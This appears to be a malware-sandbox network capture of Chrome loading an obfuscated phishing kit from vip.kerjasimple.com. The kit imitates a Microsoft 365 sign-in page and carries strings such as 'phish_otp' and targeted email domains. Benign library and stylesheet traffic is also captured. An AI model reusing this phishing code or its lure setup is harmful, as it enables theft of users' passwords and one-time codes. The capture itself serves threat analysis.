                                                        2024-11-12 15:27:04 UTC16384INData Raw: 64 20 74 68 69 73 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 6f 6e 45 72 72 6f 72 28 65 29 7d 29 2c 30 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 74 68 69 73 2e 69 6e 64 65 78 3d 69 2e 72 65 71 75 65 73 74 73 43 6f 75 6e 74 2b 2b 2c 69 2e 72 65 71 75 65 73 74 73 5b 74 68 69 73 2e 69 6e 64 65 78 5d 3d 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 45 72 72 6f 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 65 72 72 6f 72 22 2c 65 2c 74 68 69 73 2e 78 68 72 29 2c 74 68 69 73 2e 63 6c 65 61 6e 75 70 28 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 6e 75 70 22 2c 76 61 6c 75 65 3a 66 75 6e
                                                        Data Ascii: d this.setTimeoutFn((function(){t.onError(e)}),0)}"undefined"!=typeof document&&(this.index=i.requestsCount++,i.requests[this.index]=this)}},{key:"onError",value:function(e){this.emitReserved("error",e,this.xhr),this.cleanup(!0)}},{key:"cleanup",value:fun
                                                        2024-11-12 15:27:04 UTC16384INData Raw: 65 2e 64 61 74 61 2c 69 64 3a 65 2e 69 64 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 63 6f 64 65 41 73 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 22 2b 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 26 26 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 7c 7c 28 74 2b 3d 65 2e 61 74 74 61 63 68 6d 65 6e 74 73 2b 22 2d 22 29 2c 65 2e 6e 73 70 26 26 22 2f 22 21 3d 3d 65 2e 6e 73 70 26 26 28 74 2b 3d 65 2e 6e 73 70 2b 22 2c 22 29 2c 6e 75 6c 6c 21 3d 65 2e 69 64 26 26 28 74 2b 3d 65 2e 69 64 29 2c 6e 75 6c 6c 21 3d 65 2e 64 61 74 61 26 26 28 74 2b 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 2e 64 61 74 61 2c 74 68 69
                                                        Data Ascii: e.data,id:e.id})}},{key:"encodeAsString",value:function(e){var t=""+e.type;return e.type!==Be.BINARY_EVENT&&e.type!==Be.BINARY_ACK||(t+=e.attachments+"-"),e.nsp&&"/"!==e.nsp&&(t+=e.nsp+","),null!=e.id&&(t+=e.id),null!=e.data&&(t+=JSON.stringify(e.data,thi
                                                        2024-11-12 15:27:04 UTC1543INData Raw: 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 28 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 61 74 74 65 6d 70 74 22 2c 74 2e 62 61 63 6b 6f 66 66 2e 61 74 74 65 6d 70 74 73 29 2c 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 74 2e 6f 70 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 28 74 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 2c 74 2e 72 65 63 6f 6e 6e 65 63 74 28 29 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 65 72 72 6f 72 22 2c 6e 29 29 3a 74 2e 6f 6e 72 65 63 6f 6e 6e 65 63 74 28 29 7d 29 29 29 7d 29 2c 6e 29 3b 74 68 69 73 2e 6f 70 74 73 2e 61 75 74 6f 55 6e 72 65 66 26 26 72 2e
                                                        Data Ascii: etTimeoutFn((function(){t.skipReconnect||(e.emitReserved("reconnect_attempt",t.backoff.attempts),t.skipReconnect||t.open((function(n){n?(t._reconnecting=!1,t.reconnect(),e.emitReserved("reconnect_error",n)):t.onreconnect()})))}),n);this.opts.autoUnref&&r.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.649748159.89.194.494436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:04 UTC398OUTGET /m/jsv.js HTTP/1.1
                                                        Host: vip.kerjasimple.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: _cid=5f71965d2c5dc4b3564f21c2f63a98cd
                                                        2024-11-12 15:27:04 UTC517INHTTP/1.1 200 OK
                                                        cache-control: public, max-age=604800
                                                        expires: Tue, 19 Nov 2024 15:27:04 GMT
                                                        etag: "1da7f-672e5764-17a200;;;"
                                                        last-modified: Fri, 08 Nov 2024 18:24:36 GMT
                                                        content-type: application/x-javascript
                                                        content-length: 121471
                                                        accept-ranges: bytes
                                                        date: Tue, 12 Nov 2024 15:27:04 GMT
                                                        server: LiteSpeed
                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                        connection: close
                                                        2024-11-12 15:27:04 UTC16384INData Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 62 32 37 36 28 29 20 7b 0a 20 20 20 20 63 6f 6e 73 74 20 5f 30 78 35 65 64 39 34 34 20 3d 20 5b 27 68 72 65 66 27 2c 20 27 2e 70 68 6f 6e 65 6f 74 70 54 65 78 74 27 2c 20 27 72 65 61 64 79 53 74 61 74 65 27 2c 20 27 23 70 6c 61 79 6d 65 5f 62 69 67 27 2c 20 27 40 69 6f 6e 6f 73 2e 27 2c 20 27 23 70 6c 61 79 6d 65 27 2c 20 27 72 65 73 69 7a 65 27 2c 20 27 73 32 63 5f 72 65 73 74 61 72 74 27 2c 20 27 2e 6c 6f 61 64 65 72 78 42 6c 6f 63 6b 31 31 27 2c 20 27 73 32 63 27 2c 20 27 63 6f 6d 70 6c 65 74 65 27 2c 20 27 4f 33 36 35 27 2c 20 27 75 72 6c 28 5c 78 32 37 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 62 61 63
                                                        Data Ascii: function _0xb276() { const _0x5ed944 = ['href', '.phoneotpText', 'readyState', '#playme_big', '@ionos.', '#playme', 'resize', 's2c_restart', '.loaderxBlock11', 's2c', 'complete', 'O365', 'url(\x27https://aadcdn.msauth.net/shared/1.0/content/images/bac
                                                        2024-11-12 15:27:04 UTC16384INData Raw: 78 32 30 3c 61 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 65 6d 61 69 6c 4c 61 62 65 6c 5c 78 32 32 3e 65 6d 61 69 6c 40 67 6d 61 69 6c 2e 63 6f 6d 3c 2f 61 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 62 72 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 2f 64 69 76 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 61 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 73 69 67 6e
                                                        Data Ascii: x20<a\x20class=\x22emailLabel\x22>email@gmail.com</a>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<br>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20</div>\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<a\x20class=\x22sign
                                                        2024-11-12 15:27:04 UTC16384INData Raw: 20 27 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 27 2c 20 27 62 72 6f 77 73 65 72 4c 61 6e 67 75 61 67 65 27 2c 20 27 70 68 69 73 68 5f 6f 74 70 27 2c 20 27 65 6d 61 69 6c 27 2c 20 27 68 74 6d 6c 27 2c 20 27 62 61 6e 6e 65 72 4c 6f 67 6f 27 2c 20 27 6f 6e 72 65 73 69 7a 65 27 2c 20 27 4c 44 31 31 27 2c 20 27 40 61 6f 6c 2e 27 2c 20 27 2e 62 67 5f 69 6d 61 67 65 5f 64 69 76 27 2c 20 27 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 6d 65 74 61 5c 78 32 30 63 68 61 72 73 65 74 3d 5c 78 32 32 55 54 46 2d 38 5c 78 32 32 3e 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 3c 6d 65 74 61 5c 78 32 30 68 74 74 70 2d 65 71 75 69 76 3d 5c 78 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 5c 78 32 32 5c 78 32 30 63 6f 6e 74 65 6e 74 3d
                                                        Data Ascii: 'preventDefault', 'browserLanguage', 'phish_otp', 'email', 'html', 'bannerLogo', 'onresize', 'LD11', '@aol.', '.bg_image_div', '\x0a\x20\x20\x20\x20<meta\x20charset=\x22UTF-8\x22>\x0a\x20\x20\x20\x20<meta\x20http-equiv=\x22X-UA-Compatible\x22\x20content=
                                                        2024-11-12 15:27:05 UTC16384INData Raw: 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 31 30 30 76 68 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 5c 78 32 30 23 30 30 30 30 30 30 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 5c 78 32 30 31 30 30 25 5c 78 32 30 61 75 74 6f 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2f 2a 5c 78 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 5c 78 32 30 75 72 6c 28 5c 78 32 37 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f
                                                        Data Ascii: x20\x20height:\x20100vh;\x0a\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20#000000;\x0a\x20\x20\x20\x20\x20\x20\x20\x20background-size:\x20100%\x20auto;\x0a\x20\x20\x20\x20\x20\x20\x20\x20/*\x20background-image:\x20url(\x27https://aadcdn.msauth.net/
                                                        2024-11-12 15:27:05 UTC16384INData Raw: 30 5c 78 32 30 5c 78 32 30 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 5c 78 32 30 73 6f 6c 69 64 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 5c 78 32 30 30 70 78 5c 78 32 30 30 70 78 5c 78 32 30 31 70 78 5c 78 32 30 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 5c 78 32 30 6c 69 67 68 74 67 72 61 79 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 68 65 69 67 68 74 3a 5c 78 32 30 34 33 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                                        Data Ascii: 0\x20\x20border-style:\x20solid;\x0a\x20\x20\x20\x20\x20\x20\x20\x20border-width:\x200px\x200px\x201px\x200px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20border-color:\x20lightgray;\x0a\x20\x20\x20\x20\x20\x20\x20\x20height:\x2043px;\x0a\x20\x20\x20\x20\x20\x20\x
                                                        2024-11-12 15:27:05 UTC16384INData Raw: 6c 61 79 3a 5c 78 32 30 66 6c 65 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 31 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 7d 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 2e 61 6d 6e 6f 74 72 6f 62 6f 74 5c 78 32 30 7b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 5c 78 32 30 2d 37 30 70 78 3b 5c 78 30 61 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 6d 61 72 67 69 6e 2d 74 6f 70 3a 5c 78 32
                                                        Data Ascii: lay:\x20flex;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-left:\x2010px;\x0a\x20\x20\x20\x20}\x0a\x20\x20\x20\x20\x0a\x20\x20\x20\x20.amnotrobot\x20{\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-left:\x20-70px;\x0a\x20\x20\x20\x20\x20\x20\x20\x20margin-top:\x2
                                                        2024-11-12 15:27:05 UTC16384INData Raw: 29 2c 20 5f 30 78 31 63 37 30 65 63 29 2c 20 77 69 6e 64 6f 77 5b 27 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 27 5d 28 5f 30 78 35 64 35 35 39 63 28 30 78 31 36 31 29 2c 20 5f 30 78 31 63 37 30 65 63 29 2c 20 77 69 6e 64 6f 77 5b 5f 30 78 35 64 35 35 39 63 28 30 78 31 62 63 29 5d 28 27 6d 6f 75 73 65 6d 6f 76 65 27 2c 20 5f 30 78 31 63 37 30 65 63 29 2c 20 77 69 6e 64 6f 77 5b 5f 30 78 35 64 35 35 39 63 28 30 78 31 62 63 29 5d 28 5f 30 78 35 64 35 35 39 63 28 30 78 31 36 63 29 2c 20 5f 30 78 31 63 37 30 65 63 29 2c 20 77 69 6e 64 6f 77 5b 5f 30 78 35 64 35 35 39 63 28 30 78 31 62 63 29 5d 28 5f 30 78 35 64 35 35 39 63 28 30 78 31 64 31 29 2c 20 5f 30 78 31 63 37 30 65 63 29 29 3b 0a 20 20 20 20 7d 28 29 29 3b 0a 20 20 20 20 63 6f 6e 73 74 20 5f 30
                                                        Data Ascii: ), _0x1c70ec), window['addEventListener'](_0x5d559c(0x161), _0x1c70ec), window[_0x5d559c(0x1bc)]('mousemove', _0x1c70ec), window[_0x5d559c(0x1bc)](_0x5d559c(0x16c), _0x1c70ec), window[_0x5d559c(0x1bc)](_0x5d559c(0x1d1), _0x1c70ec)); }()); const _0
                                                        2024-11-12 15:27:05 UTC6783INData Raw: 28 29 5b 5f 30 78 35 32 35 34 31 30 28 30 78 31 38 32 29 5d 28 5f 30 78 35 32 35 34 31 30 28 30 78 31 35 66 29 29 20 7c 7c 20 5f 30 78 33 39 39 30 62 33 5b 5f 30 78 35 32 35 34 31 30 28 30 78 31 66 31 29 5d 5b 5f 30 78 35 32 35 34 31 30 28 30 78 31 36 39 29 5d 28 29 5b 5f 30 78 35 32 35 34 31 30 28 30 78 31 38 32 29 5d 28 5f 30 78 35 32 35 34 31 30 28 30 78 31 65 39 29 29 20 7c 7c 20 5f 30 78 33 39 39 30 62 33 5b 5f 30 78 35 32 35 34 31 30 28 30 78 31 66 31 29 5d 5b 5f 30 78 35 32 35 34 31 30 28 30 78 31 36 39 29 5d 28 29 5b 5f 30 78 35 32 35 34 31 30 28 30 78 31 38 32 29 5d 28 5f 30 78 35 32 35 34 31 30 28 30 78 31 36 38 29 29 20 7c 7c 20 5f 30 78 33 39 39 30 62 33 5b 5f 30 78 35 32 35 34 31 30 28 30 78 31 66 31 29 5d 5b 5f 30 78 35 32 35 34 31 30 28 30
                                                        Data Ascii: ()[_0x525410(0x182)](_0x525410(0x15f)) || _0x3990b3[_0x525410(0x1f1)][_0x525410(0x169)]()[_0x525410(0x182)](_0x525410(0x1e9)) || _0x3990b3[_0x525410(0x1f1)][_0x525410(0x169)]()[_0x525410(0x182)](_0x525410(0x168)) || _0x3990b3[_0x525410(0x1f1)][_0x525410(0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        33192.168.2.64975313.107.246.454436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:04 UTC655OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                        Host: logincdn.msauth.net
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://vip.kerjasimple.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:27:04 UTC799INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:04 GMT
                                                        Content-Type: image/svg+xml
                                                        Content-Length: 276
                                                        Connection: close
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Encoding: gzip
                                                        Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                                        ETag: 0x8D79ED35591CF44
                                                        x-ms-request-id: 5d7fa529-001e-0047-47e1-3497a0000000
                                                        x-ms-version: 2009-09-19
                                                        x-ms-lease-status: unlocked
                                                        x-ms-blob-type: BlockBlob
                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                        Access-Control-Allow-Origin: *
                                                        x-azure-ref: 20241112T152704Z-16547b76f7f7lhvnhC1DFWa2k00000000fp000000000h1sz
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:04 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                                        Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        34192.168.2.649751192.229.133.2214436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:04 UTC548OUTGET /w3css/4/w3.css HTTP/1.1
                                                        Host: www.w3schools.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: text/css,*/*;q=0.1
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: style
                                                        Referer: https://vip.kerjasimple.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:27:04 UTC580INHTTP/1.1 200 OK
                                                        Age: 95366
                                                        Cache-Control: public,max-age=31536000,public
                                                        Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                                        Content-Type: text/css
                                                        Date: Tue, 12 Nov 2024 15:27:04 GMT
                                                        Etag: "0cabbc93534db1:0+gzip+ident"
                                                        Last-Modified: Mon, 11 Nov 2024 12:32:36 GMT
                                                        Server: ECS (lhd/35B3)
                                                        Vary: Accept-Encoding
                                                        X-Cache: HIT
                                                        X-Content-Security-Policy: frame-ancestors 'self' https://mycourses.w3schools.com https://pathfinder.w3schools.com;
                                                        X-Powered-By: ASP.NET
                                                        Content-Length: 23427
                                                        Connection: close
                                                        2024-11-12 15:27:04 UTC16383INData Raw: ef bb bf 2f 2a 20 57 33 2e 43 53 53 20 34 2e 31 35 20 44 65 63 65 6d 62 65 72 20 32 30 32 30 20 62 79 20 4a 61 6e 20 45 67 69 6c 20 61 6e 64 20 42 6f 72 67 65 20 52 65 66 73 6e 65 73 20 2a 2f 0a 68 74 6d 6c 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2a 2c 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 0a 2f 2a 20 45 78 74 72 61 63 74 20 66 72 6f 6d 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 62 79 20 4e 69 63 6f 6c 61 73 20 47 61 6c 6c 61 67 68 65 72 20 61 6e 64 20 4a 6f 6e 61 74 68 61 6e 20 4e 65 61 6c 20 67 69 74 2e 69 6f 2f 6e 6f 72 6d 61 6c 69 7a 65 20 2a 2f 0a 68 74 6d 6c 7b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62
                                                        Data Ascii: /* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}/* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */html{-ms-text-size-adjust:100%;-web
                                                        2024-11-12 15:27:04 UTC7044INData Raw: 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 62 63 64 34 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 62 6c 75 65 2d 67 72 65 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 65 79 3a 68 6f 76 65 72 2c 2e 77 33 2d 62 6c 75 65 2d 67 72 61 79 2c 2e 77 33 2d 68 6f 76 65 72 2d 62 6c 75 65 2d 67 72 61 79 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 30 37 64 38 62 21 69 6d 70 6f 72 74 61 6e 74 7d 0a 2e 77 33 2d 67 72 65 65 6e 2c 2e 77 33 2d 68 6f 76 65 72 2d 67 72 65 65 6e 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23
                                                        Data Ascii: !important;background-color:#00bcd4!important}.w3-blue-grey,.w3-hover-blue-grey:hover,.w3-blue-gray,.w3-hover-blue-gray:hover{color:#fff!important;background-color:#607d8b!important}.w3-green,.w3-hover-green:hover{color:#fff!important;background-color:#


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        35192.168.2.649754159.89.194.494436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:04 UTC679OUTGET /favicon.ico HTTP/1.1
                                                        Host: vip.kerjasimple.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://vip.kerjasimple.com/m/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9V0haS1dHND0mdWlkPVVTRVIwNjExMjAyNFUxMTExMDYwOQ==N0123N
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-11-12 15:27:04 UTC413INHTTP/1.1 200 OK
                                                        etag: "1089-0-146b90;br"
                                                        last-modified: Thu, 01 Jan 1970 00:00:00 GMT
                                                        content-type: text/html
                                                        content-length: 4233
                                                        accept-ranges: bytes
                                                        date: Tue, 12 Nov 2024 15:27:04 GMT
                                                        server: LiteSpeed
                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                        connection: close
